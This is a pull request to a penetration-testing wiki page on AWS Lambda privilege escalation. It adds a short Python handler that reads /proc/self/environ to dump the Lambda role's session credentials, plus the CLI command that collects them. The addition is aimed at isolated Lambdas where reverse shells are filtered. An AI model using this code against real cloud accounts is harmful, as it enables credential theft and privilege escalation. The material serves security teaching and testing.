### PR TITLE
arte-mightocho

### DIFF
--- a/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-lambda-privesc.md
+++ b/pentesting-cloud/aws-pentesting/aws-privilege-escalation/aws-lambda-privesc.md
@@ -74,6 +74,21 @@ def lambda_handler(event, context):
     return response
 ```
 
+It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda. 
+
+```python 
+def handler(event, context):
+    sessiontoken = open('/proc/self/environ', "r").read()
+    return {
+        'statusCode': 200,
+        'session': str(sessiontoken)
+    }
+```
+```
+aws lambda invoke --function-name <lambda_name> output.txt
+cat output.txt
+```
+
 **Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
 
 {% hint style="danger" %}


### PR DESCRIPTION
Quick token exfiltration lambda for isolated lambdas

If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`.

Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction.

In any case, thanks for contributing to HackTricks!
